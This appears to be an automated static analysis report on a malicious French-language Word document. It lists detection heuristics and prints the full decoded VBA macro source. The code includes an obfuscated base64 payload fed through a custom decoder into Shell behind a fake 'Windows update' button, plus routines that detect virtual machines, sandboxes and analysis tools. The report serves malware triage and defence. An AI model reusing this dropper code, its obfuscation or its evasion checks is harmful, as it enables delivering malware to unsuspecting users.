Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 61d5a5aa0346e201…

MALICIOUS

Office (OLE)

166.0 KB Created: 2017-10-19 16:29:00 Authoring application: Microsoft Office Word First seen: 2017-10-28
MD5: c4d7cdc3685d094d5d45f772e92534ae SHA-1: 12b17ab1c4099c00ee7d39d904b5d744e4a2d022 SHA-256: 61d5a5aa0346e20127ba663cc611acc412993dea3d12e468f4fcc9b663792432
350 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The document body attempts to trick the user into clicking a button labeled 'Mise à jour de la station de travail Windows' (Windows workstation update). Upon clicking, the VBA macro executes cmd.exe, as indicated by multiple heuristics including OLE_VBA_SHELL and OLE_VBA_CMD. The macro's intent is to download and execute a second-stage payload, though the specific payload and download mechanism are obfuscated and truncated.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6364326-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6364326-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    JSYKsfbkulFLwzF = "Wsv5LQjsp7Zk1zTJ95XU84d+wa7Ve/4016/BFfco2xictpul+bCcDzOsPL1G/F0ki9sviME+tZQsbFihVP"
    Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode))
        Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        If CreateObject("Scripting.FileSystemObject").FileExists(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
        Set ws = GetObject("winmgmts:\\.\root\cimv2")
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode))
        Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus)
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Dim userDomain As String
        userDomain = Environ$("userdomain")
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 44648 bytes
SHA-256: 91c6cdef2d838a65a14af479a16554fc3c73808673b588b19f9ffc2bf9619b75
Detection
ClamAV: No threats found
Obfuscation or payload: likely
185 of 367 identifiers look randomly generated (e.g. 'dAV5aLRSox1FNDD5neJYMFZblXYwAgPKZJnC3Ikd') — consistent with name-mangling obfuscation. Carved artifact contains 20 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Mise_a_jour_de_la_station_de_travail1, 0, 0, MSForms, CommandButton"
Private Sub Mise_a_jour_de_la_station_de_travail1_Click()
    Call mise_a_jour_windows
End Sub

Attribute VB_Name = "Module1"

Sub mise_a_jour_windows()
    On Error Resume Next

    'If checkRecentDocs Then
        'MsgBox ("1")
        'Exit Sub
    'End If
    
    'If checkNbrOfTask Then
        'MsgBox ("2")
        'Exit Sub
   ' End If
    
    'If Not checkTasks Then
        'Exit Sub
    'End If
    
    'checkZoneIdentifier
    
    'checkPartOfDomain
    
    'If checkBios Then
        ''MsgBox ("3")
        'Exit Sub
   ' End If
    
    'If checkPnP Then
        'MsgBox ("4")
        'Exit Sub
    'End If
    
    'If checkUsername Then
        'MsgBox ("5")
        'Exit Sub
    'End If
    
    'If checkFilenameHash Then
        'MsgBox ("6")
        'Exit Sub
   ' End If
    
    'If checkFilenameBad Then
        'Exit Sub
    'End If
    
    'checkPreciseFileName
    
    'checkCores

    'If checkAppCount Then
        'Exit Sub
   ' End If
    
    'If checkApps Then
        'Exit Sub
    'End If
    
    'If verifyPreciseDomain Then
        'Exit Sub
    'End If

Dim JSYKsfbkulFLwzF As String
Dim EKKdVAjzttW As String
Dim cTdzQWOUWEEVexjiF As String
Dim TkvnhzpvknoLxyTmn As String
Dim fXhXNVEleO As String
Dim NJqYJJYErv As String
Dim hDXThtgUsEh As String
Dim rkqdOMkxmnSp As String
Dim WauMdbKKmxueesFlTRlH As String
Dim wxpLHjNnjVZ As String
Dim pUCAotjVuCQBfkftGrwC As String
Dim FhnDRjyhZREVMT As String
cTdzQWOUWEEVexjiF = "OMm1WEG35CB10cfBkZepJ38LUfkeK4HwnJPU7plwIw2+1r6eiWTFSogVe1LHUPBjbzeKtlPbY1CKWErjH8U=PEnxK1NheiLSSSdgZMaITxoR1FNgD5xmJYzTZddXYE3gIlHJWC3ab9K6O7=LbMbdzib9s4PLc6CzVVMm7gjsab28rA7J24NG4EDIduZ1QjnYOBI/8e=8MNWiQffy1rXZiLqoSOQDVhLHhyBlvReWclPSlxk2GE8sHl0GPZr/zEhhngLccSdsVCaUISoTVwO=DNe9J0zFoQhXVdNzGLZls33m29xL27LBbMR1zwdTfZNL86/88sMg39jcab2jBAzv24qa4YqugK21urnqJVICTe=OENFbQfbj1h6QiLXNSzeDVD8k7iB3YzeJvYSG1xI6GM1eHN4D7/f/FlcMzMLVandEEQf4ISUiVsmND3UmUHNFptdwKGNZ/1ZP93UKU9Jp29nGb01+zvcTQxNLfg/3VsM8UgjVFpt3"
TkvnhzpvknoLxyTmn = "BANs2OSq7k0u1=0f3mn+HgIj2jjPCNM+QfRN12fQs/8NjTXRyvL47BB9vJeRloHl1xNlGi7eUlsDJ/h9fgsn6MLFanlyEQ1KISGWVsvMVnem8QYH6PFAvtNE/1xO93dAU6xb25szSV7+wjf1CSNQr9/fvsdb79i7FH2VBbNje26qMavs1=0KHmnNdgOa2jf0CpmzQ1rN1pCQ0ub7k2X7VXL=gEHslzKBlcPp1UWDGGce5ftR/xhv6dspqv/8anj1EGfhIoCWOVjMbFLUfuYJgPFtvtBqg18M93iHU1kseqNzNIfIuYfZ5qNtp9vElv2q7kMvFM0Dlk7jcIUi4xv+pk0cUcnPRgAl2IjyCOxKRacNW94XHP8BGnXuup/zJEtvlj4gle/1P+/DTEfeA8gfPbhLK99QfMxAadl1EkvinniWpMm+=5LcJuYNMPJvl3Y/gGZO9diSd1vsO5=8FMfo9YfwCSBkr9i2l4gn7/3AFQtDhJqlT2UX"
fXhXNVEleO = "Lbvve=yPhmDUR8Ih2IwnCmmKS9v7eW4ADg8TwngYeX7UJgHslgJdYMH1wBCRiEftt4gBrx=oK9N6fMUHamHA04git0oBNwmdAZLPgu+NZqdblO3og/1VNG3S3dKY2y=q+vfXW9r7sSYhr6p5l3=IKewA6M9R5d73e4Um4bDHd=MXhx8RRK97erRngzMObzfB6W4D8fiyS4fpenw1Jg+jYNDdzoP1Y1Cd1Bfq24YrPbnHK6MefheSa17AFwa3gro+xwm7=5/eJu09Z3RXldOggChVsEwc5dK0O7=gbMr/zYdTs0B6rkkzlhgIs8rgAp27mA75247t4bbHd=6phHXYJVK7h8f=pwWxYOfSlr6KiWbpSogle1pHJRSjtjeK/oPvlxCLiBrsH8tePym/Klgh62wSEwGAmQaInSoqAwN5D58aJY7TZwBXYcDgIgZJ5C3yvgKwO7yIbMlxz=b9sTDLcpzzdVMmbdjqnp2FcL7624EO4b7kdUp1"
NJqYJJYErv = "QTzYOKI/ee=8p2WvUfrw1rx8iWLNSo0D/p7HcyBlhOelqYPnlxkEGEv8H+lDPYa/zghhnILcDHdskQaJISoGVwjXD5U=JjdFoQhXViYz/1Zlq33h3gxe27f9bIDwz6cTbrSLfd/8qjMgG9j9XpGUBA5A24oL4BkugU819jnqOgIy5j=xENFQQfdp1h68iLINSsXDQQ8k8iB3vJeYloPL1xLGGMdeHhrDBan/cFshTtLVwSd=m5fEISuOV=gNDKemUzYF3nFwvGNiCLZWVtU3U92m27ESbgY+GHbTK+YVq1/qqsM/tg3LFp+DBECs2O5q7I0uMc0fyHnMJgIjcejKCNpwQuro12CQhI=NJzeDq+LJ8EBglztglo501BCVGybeUasDFbh/9gsnSML4zHl=EQMVI0JDVIWMFB7mhQYFIqFVl3NdxKZA93bBU6Kb2ZrzSVY+kwf1lqNPqd/Evsd779izFHaGByNjDRUqLbvs1c0KXcnfgVOF"
hDXThtgUsEh = "2jfYC/oCQ7bNPmfQTm87m4XfqvLFfBH1lzW3lcPP1sLDtg=ewhgRFxh3T9siqvL+anaEEwcVITCWON3Mbh8UsjYJSPFRl3BDg1H/938HUrKs2qNzRMf+w9frAqNUIgvolvp4768AFM+DlC5jhHzqHxvE6c0ThmnRRgV12jE6CAuKRgcN4r4XTg8W=IXkupXuJESFlzcgle51PICD=FvTpagTYbh0T9MWfMwAanh1EK6iILQWxwmM8ZL/JuYiTPIWl3P8g1=t9bbSU3/s67=zttfNzYf/sSBur9iRlSh/7krAm7tDAb7lT2UIVxvt/k0OhmOTR8Al2MNnxreKYav7g94A0W88+4XEeXOyJMWFlrDdlUb1WGIRyPfB58g1Jx=hK9cufIUAaudA04UiB0oB1wmy=5Ljgu+DZqcOlp+3gT6VWRmSvsuYcn=Pfvf5w9rosSYBrkpSlLdIlEiA6Q9R3k7374UGHx5Hd=JlhLwRRTi7eeBng/WO"
rkqdOMkxmnSp = "MVfBWr408fi9S4eVeuL1JrTjYJ6ddlPfeACT5Pf7B4YdPbaCKkMhf0xS4HEA/wa3=roFUFmjD5XdJuwFZdValODg2yZVacwck9KM77=r5MNwzYcEsTPKr/7zlmUIGgjgmo2T3A7H247t4bGndK2PhQzYJgK7O7==5NWBZOf+YW60iWTmSTQGeDiHJR7jtjeKKbPbWxCL2BPiH8rpPbG/KkOhei7Sk/dAV5aLRSox1FNDD5neJYMFZblXYwAgPKZJnC3IkdKH8yjEbM7Dzib9s4WLc6CzVVMIt9juAs2urACI24wH4EGZdn61QmbYOhA/02=f5NWdUfrA1rdZiCVNSJdD//CHWF+lYzelboPsR1kRGEdSH+YDPan/z/XhUgLcendLEQauqqR0VwQTDN79J50FZkFXbEYzGgZ6hG3TU9xO27LIb8b+zXbTsLPLp8i8hvMKs9j3FpGMBAxv2TSq4YCugk21DrnqODIo2j=/ENWbQfdw1hPR"
WauMdbKKmxueesFlTRlH = "imzNH2lDkvLkNiB3/RefdYSA1xI6GgYeHTsDBbN/fkcM65LaKndjFQfWISiDVsmNDv/mN90F3tdwqGNYb1Zz93UqU9Qk27iSbVd+GifTC4NVG9/YYvMNG93QFpLGBz6022Sq7avu12JfHrn9HgIR8ej4CNu5Qu1o1bQQhCqNmqeRyvLJ7BB9tztMloAR1x4VGg=eUTrDYuh9F1sCSMLdKnlbEQMVI0vDVI+MDnem8jYHoWFpdtNqg1Z093mTUkxD2eNzS27+kxf1frN7Ld/pvsdN79BzFprlBdCje26qzBmswU0ZXcncoVOi2jfYCpoKQzcN4VQQ8g87H2XMCXL/JEBTlzwjlcH11+ODTJ=ewftRF/hs=gsVxM/QanGOEwRVIrTWOTQMqBLmL7YwTPFzvt8pg1hp9pwOUldse78z53vIkxfZgqNUfgvRlv=n763AFEoD3K6j64UqkYv+zk0AUcnvRgvH2xMxCiMKQ3fNlq4QYf8v+4Xr"
wxpLHjNnjVZ = "upXLJEUFljeBl5L1PZLDCvveg4gfYbhH9g9XfMeSanhvEF1inx7WxGmMQ5L2L7YWZqF3l3gWg1=Y9D3Sdelsce=zftfAA9fHsSBWr9GolvWI7kVAm7rDlQqjTnUPBbvF/k0lhmSKR80S21jnCZWKUav7wq4zSW8gwnXIeXx1JMUsle6dYoX1W/IRCiftgagkPb=oK9XHfMUAaDEA0E1izoUWuFmO=5Lxf7+IZqNjlpAfgThV9jwS+1KY7n=JtvfuzYrSsSwur6V5l4WIl1HAnx9D5L7i0nUZzbv4d=ThhLzrRAO72o=ngJMOZVfqg94hHf8fS4AGeucHJgOjzKvdzbPf49Cd8PfoH8g=PbnuK9OQfSwSaJFAZ1aigSorzwmuvZX=JuwTZ3NXlD+gglHVNC3c+9KIRy=QbMrzzYdUsSOLr17zYLYIKEjABs2dlA7nO4Q44b04d=c1hjOYJT87D7==x4WRMVfs1r4UiWVmSTeVeuSHNg+j"
pUCAotjVuCQBfkftGrwC = "adedSoPElxC6iBr7H8rGPEA/K/3hfs8SkmdgkCa6MqodVwNGD5hfJudmZdtXY=AgbyZJB33V3gKX8yjUbMc7zib9soBLrsizzZMmsdjL5b2BBACw24ER4bfZdqY1QHWYOXA7Te=z72WyUffr1rCGiWFESuXD/hiHhYBlSzeu/lPAY1C=GE7LHlgVPBn/zkchUgLcamduFQaFRSReVwQsD53GJj+FokFXaCNgwKZ6N33AegxL27LIb8fwzZ2Tb=WLtkiz8sM7K9jRabGIBAg=2olE4v9ugfp1lI1Y8gIBej=e72FNQfvw1h6/iIiNHHeD+nLkaiBizzeBtoSM1xYaGgf3HTUDB58/+kcMetLq4ndym5faISUVV=jXD3UmNBNF3odwKCN9KLZvVt3KU9/e27nzb01+GHbTK+YLU9/3VsM279uCFpLGBE5j2Omq7LeusmJ1UHnooVIm2j=pCNolQfTN1CPQhgqNJ2XDy+LTsPBnvJdnlobG"
FhnDRjyhZREVMT = "1xWDGU2eUa5D7va/tgsKxML2anRfEQ6uIS/iVROMVa7mF80HkWF8cGNag1Q493bSU9db2ZfzbJf+kxf1rxNQp9/5tvo=79MiFH+VBd6j2x4qzYvsec0KlcnboVOU2jgiC/WCQzbNPh4QSC87m4XT/XL/JEB6lzKMlc9h1ILDGGce5NgRf/hS8gsiqvL+anj7EGg2In7WV7mMqvLU74YK3qFmt3B1g1hV938OU8lsenBzNif+v9frCSNtr9vllvS/76jiFaoDBW7jO2Ui//v7e=0hHm8bRgVS2jE6CApKQ3fNmq4XiP82+4XG8XLbJEFsljtBlbR1PZLDCifT58gMf/he9gsLfM80ad71EMRinLQWzrg+VuLOF7Y03qJil3RDgGWt9iHSUsusDNfz1vfN9YfcAqNsr9p5lShI7/1AmO2Drz7jcnUUHxvad=ykhmpBRgCl2Ipn5AmKS3fNe94eHf8D+4gMeXc8JCMQ"
EKKdVAjzttW = cTdzQWOUWEEVexjiF + TkvnhzpvknoLxyTmn + fXhXNVEleO + NJqYJJYErv + hDXThtgUsEh + rkqdOMkxmnSp + WauMdbKKmxueesFlTRlH + wxpLHjNnjVZ + pUCAotjVuCQBfkftGrwC + FhnDRjyhZREVMT
JSYKsfbkulFLwzF = "Wsv5LQjsp7Zk1zTJ95XU84d+wa7Ve/4016/BFfco2xictpul+bCcDzOsPL1G/F0ki9sviME+tZQsbFihVP"
Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode))
    Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus)

End Sub

Public Function checkApps() As Boolean

    
    d = False
    tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
    Set ws = GetObject("winmgmts:\\.\root\cimv2")
    
    Dim names() As String
    ReDim names(WordBasic.AppCount())
    
    WordBasic.AppGetNames names
    
    For Each n In names
        For Each tn In tns
            If InStr(LCase(n), tn) > 0 Then
                d = True
            End If
        Next
    Next

    If d Then
    
        checkApps = True
        
    Else
    
        checkApps = False
    End If
    
End Function

Public Function checkAppCount() As Boolean

    If WordBasic.AppCount() < 50 Then
    
        checkAppCount = True
        
    Else
    
        checkAppCount = False
    End If
    
End Function

Public Function checkPreciseFileName() As Boolean

    
    badName = False

  
    If ActiveDocument.Name <> "Pafish.docm" Then
            badName = True
    End If
 
    If badName Then
        
        checkPreciseFileName = True
    Else
        
        checkPreciseFileName = False
    End If
    
End Function

Public Function checkFilenameHash() As Boolean

    
    hexchars = "0123456789abcdef"
    
    c = 0
    
    For i = 1 To Len(ThisDocument.Name)
        s = Mid(LCase(ThisDocument.Name), i, 1)
        
        If InStr(s, hexchars) > 0 Then
            c = c + 1
        End If
        
    Next
    
    If c >= (Len(ThisDocument.Name) - 5) Then
        checkFilenameHash = True
        
    Else
    
    
        checkFilenameHash = False
    End If
    
End Function

Public Function checkFilenameBad() As Boolean

    
    badName = False
    badNames = Array("malware", "myapp", "sample", ".bin", "mlwr_", "Desktop")

    
    For Each n In badNames
        If InStr(LCase(ActiveDocument.FullName), n) > 0 Then
            badName = True
        End If
    Next
 

    If badName Then
        
        checkFilenameBad = True
    Else
        
        checkFilenameBad = False
    End If
    
End Function

Public Function checkTasks() As Boolean


    badTask = False
    badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler")
    
    For Each Task In Application.Tasks
    
        For Each badTaskName In badTaskNames
            If InStr(LCase(Task.Name), badTaskName) > 0 Then
                badTask = True
            End If
        Next
        
    Next

    If badTask Then
        
         checkTasks = True
    Else
        
         checkTasks = False
    End If
    
End Function

Public Function checkCores() As Boolean


    badCores = 0

    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
    
    For Each objItem In colItems
    
            If objItem.NumberOfCores < 3 Then
                badCores = True
            End If
        
    Next

    If badCores Then
        
        printMsg "DETECTED"
    Else
        
        printMsg "OK"
    End If
    
End Function

Public Function checkBios() As Boolean


    badBios = False
    badBiosNames = Array("virtualbox", "vmware", "kvm")
    
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_Bios", , 48)
    
    For Each objItem In colItems
    
        For Each badName In badBiosNames
            If InStr(LCase(objItem.SMBIOSBIOSVersion), badName) > 0 Then
                badBios = True
            End If
            If InStr(LCase(objItem.SerialNumber), badName) > 0 Then
                badBios = True
            End If
        Next
        
    Next

    If badBios Then
        
        checkBios = True
    Else
        
        checkBios = False
    End If
    
End Function

Public Function checkPnP() As Boolean


    badPNP = False
    badPNPNames = Array("VEN_80EE", "VEN_15AD")
    
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_PnPEntity", , 48)
    
    For Each objItem In colItems
    
        For Each badName In badPNPNames
            If InStr(LCase(objItem.DeviceId), badName) > 0 Then
                badPNP = True
            End If
        Next
        
    Next

    If badPNP Then
        
        checkPnP = True
    Else
        
        checkPnP = False
    End If
    
End Function

Public Function checkUsername() As Boolean


    badUsername = False
    badUsernames = Array("admin", "malfind", "sandbox", "test")
    
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
    
    For Each objItem In colItems
    
        For Each badName In badUsernames
            If InStr(LCase(objItem.UserName), badName) > 0 Then
                badUsername = True
            End If
        Next
        
    Next

    If badUsername Then
        
        checkUsername = True
    Else
        
        checkUsername = False
    End If
    
End Function

Public Function verifyPreciseDomain() As Boolean

    Dim domainToCheck As String
    domainToCheck = "saturne"
    Dim userDomain As String
    userDomain = Environ$("userdomain")
    
    If InStr(LCase(userDomain), LCase(domainToCheck)) Then
        verifyPreciseDomain = False
    Else
        verifyPreciseDomain = True
    End If
End

End Function

Public Function checkPartOfDomain() As Boolean


    partOfDomain = False
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
    
    For Each objItem In colItems
        If objItem.partOfDomain Then
            partOfDomain = True
        End If
    Next

    If partOfDomain Then
        checkPartOfDomain = True
        
    Else
        checkPartOfDomain = False
    End If
    
End Function

Public Function checkZoneIdentifier() As Boolean


    If CreateObject("Scripting.FileSystemObject").FileExists(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
    
        checkZoneIdentifier = True
        
    Else
    
        checkZoneIdentifier = False
    End If
    
End Function

Public Function checkNbrOfTask() As Boolean


    If Application.Tasks.Count < 3 Then
    
        checkNbrOfTask = True
        
    Else
    
        checkNbrOfTask = False
    End If
    
End Function

Public Function checkRecentDocs() As Boolean

    If Application.RecentFiles.Count < 3 Then
    
        checkRecentDocs = True
        
    Else
    
        checkRecentDocs = False
    End If
    
End Function

Function HdrROagFHcClGMFzo(nKyaisQnDvP As String, ujNHJbTOMZBY As String) As String
Dim vCqgDvGgcYPFSLbAf As String
Dim VTZNPWtRsKVgfWAZHCG As Long
Dim rRDeLadOxzqFpBBe As Long
Dim fCIvqJuUQOrDpoAFFD As Long
HdrROagFHcClGMFzo = ""
vCqgDvGgcYPFSLbAf = "2/q0V8ZF=1BMa7YcLztpnTWhRNsSUg65wexEDOuomAP3X4lrkKGvIy9iQJjbHdfC+"
rRDeLadOxzqFpBBe = 1
For VTZNPWtRsKVgfWAZHCG = 1 To Len(nKyaisQnDvP)
fCIvqJuUQOrDpoAFFD = InStr(vCqgDvGgcYPFSLbAf, Mid(nKyaisQnDvP, VTZNPWtRsKVgfWAZHCG, 1)) - 1
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD - (InStr(vCqgDvGgcYPFSLbAf, Mid(ujNHJbTOMZBY, rRDeLadOxzqFpBBe, 1)) - 1)
fCIvqJuUQOrDpoAFFD = (fCIvqJuUQOrDpoAFFD Mod 65)
If (fCIvqJuUQOrDpoAFFD < 0) Then
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD + 65
End If
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD + 1
HdrROagFHcClGMFzo = HdrROagFHcClGMFzo & Mid(vCqgDvGgcYPFSLbAf, fCIvqJuUQOrDpoAFFD, 1)
rRDeLadOxzqFpBBe = rRDeLadOxzqFpBBe + 1
If rRDeLadOxzqFpBBe > Len(ujNHJbTOMZBY) Then
rRDeLadOxzqFpBBe = 1
End If
Next VTZNPWtRsKVgfWAZHCG
End Function

Function YMxlfeXoQkyCchX(ByVal QdlDIrNTjASyeN As String) As Byte()
Dim JUiNmNdoJmWQkzCgPNyp As Object
Dim ilCuylucYGMVsPGKnYyE As Object
Set JUiNmNdoJmWQkzCgPNyp = CreateObject("MSXML2.DOMDocument")
Set ilCuylucYGMVsPGKnYyE = JUiNmNdoJmWQkzCgPNyp.createElement("b64")
ilCuylucYGMVsPGKnYyE.DataType = "bin.base64"
ilCuylucYGMVsPGKnYyE.Text = QdlDIrNTjASyeN
YMxlfeXoQkyCchX = ilCuylucYGMVsPGKnYyE.nodeTypedValue
Set ilCuylucYGMVsPGKnYyE = Nothing
Set JUiNmNdoJmWQkzCgPNyp = Nothing
End Function

' Processing file: /tmp/qstore_3kh5l398
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5357 bytes
' Line #0:
' 	FuncDefn (Sub Mise_a_jour_de_la_station_de_travail1())
' Line #1:
' 	ArgsCall (Call) mise_a_jour_windows 0x0000 
' Line #2:
' 	EndSub 
' Macros/VBA/Module1 - 40706 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Sub mise_a_jour_windows())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' Line #4:
' 	QuoteRem 0x0004 0x0017 "If checkRecentDocs Then"
' Line #5:
' 	QuoteRem 0x0008 0x000C "MsgBox ("1")"
' Line #6:
' 	QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #7:
' 	QuoteRem 0x0004 0x0006 "End If"
' Line #8:
' Line #9:
' 	QuoteRem 0x0004 0x0016 "If checkNbrOfTask Then"
' Line #10:
' 	QuoteRem 0x0008 0x000C "MsgBox ("2")"
' Line #11:
' 	QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #12:
' 	QuoteRem 0x0003 0x0007 " End If"
' Line #13:
' Line #14:
' 	QuoteRem 0x0004 0x0016 "If Not checkTasks Then"
' Line #15:
' 	QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #16:
' 	QuoteRem 0x0004 0x0006 "End If"
' Line #17:
' Line #18:
' 	QuoteRem 0x0004 0x0013 "checkZoneIdentifier"
' Line #19:
' Line #20:
' 	QuoteRem 0x0004 0x0011 "checkPartOfDomain"
' Line #21:
' Line #22:
' 	QuoteRem 0x0004 0x0011 "If checkBios Then"
' Line #23:
' 	QuoteRem 0x0008 0x000D "'MsgBox ("3")"
' Line #24:
' 	QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #25:
' 	QuoteRem 0x0003 0x0007 " End If"
' Line #26:
' Line #27:
' 	QuoteRem 0x0004 0x0010 "If checkPnP Then"
' Line #28:
' 	QuoteRem 0x0008 0x000C "MsgBox ("4")"
' Line #29:
' 	QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #30:
' 	QuoteRem 0x0004 0x0006 "End If"
' Line #31:
' Line #32:
' 	QuoteRem 0x0004 0x0015 "If checkUsername Then"
' Line #33:
' 	QuoteRem 0x0008 0x000C "MsgBox ("5")"
' Line #34:
' 	QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #35:
' 	QuoteRem 0x0004 0x0006 "End If"
' Line #36:
' Line #37:
' 	QuoteRem 0x0004 0x0019 "If checkFilenameHash Then"
' Line #38:
' 	QuoteRem 0x0008 0x000C "MsgBox ("6")"
' Line #39:
' 	QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #40:
' 	QuoteRem 0x0003 0x0007 " End If"
' Line #41:
' Line #42:
' 	QuoteRem 0x0004 0x0018 "If checkFilenameBad Then"
' Line #43:
' 	QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #44:
' 	QuoteRem 0x0004 0x0006 "End If"
' Line #45:
' Line #46:
' 	QuoteRem 0x0004 0x0014 "checkPreciseFileName"
' Line #47:
' Line #48:
' 	QuoteRem 0x0004 0x000A "checkCores"
' Line #49:
' Line #50:
' 	QuoteRem 0x0004 0x0015 "If checkAppCount Then"
' Line #51:
' 	QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #52:
' 	QuoteRem 0x0003 0x0007 " End If"
' Line #53:
' Line #54:
' 	QuoteRem 0x0004 0x0011 "If checkApps Then"
' Line #55:
' 	QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #56:
' 	QuoteRem 0x0004 0x0006 "End If"
' Line #57:
' Line #58:
' 	QuoteRem 0x0004 0x001B "If verifyPreciseDomain Then"
' Line #59:
' 	QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #60:
' 	QuoteRem 0x0004 0x0006 "End If"
' Line #61:
' Line #62:
' 	Dim 
' 	VarDefn ilCuylucYGMVsPGKnYyE (As String)
' Line #63:
' 	Dim 
' 	VarDefn JSYKsfbkulFLwzF (As String)
' Line #64:
' 	Dim 
' 	VarDefn EKKdVAjzttW (As String)
' Line #65:
' 	Dim 
' 	VarDefn cTdzQWOUWEEVexjiF (As String)
' Line #66:
' 	Dim 
' 	VarDefn TkvnhzpvknoLxyTmn (As String)
' Line #67:
' 	Dim 
' 	VarDefn fXhXNVEleO (As String)
' Line #68:
' 	Dim 
' 	VarDefn NJqYJJYErv (As String)
' Line #69:
' 	Dim 
' 	VarDefn hDXThtgUsEh (As String)
' Line #70:
' 	Dim 
' 	VarDefn rkqdOMkxmnSp (As String)
' Line #71:
' 	Dim 
' 	VarDefn WauMdbKKmxueesFlTRlH (As String)
' Line #72:
' 	Dim 
' 	VarDefn wxpLHjNnjVZ (As String)
' Line #73:
' 	Dim 
' 	VarDefn pUCAotjVuCQBfkftGrwC (As String)
' Line #74:
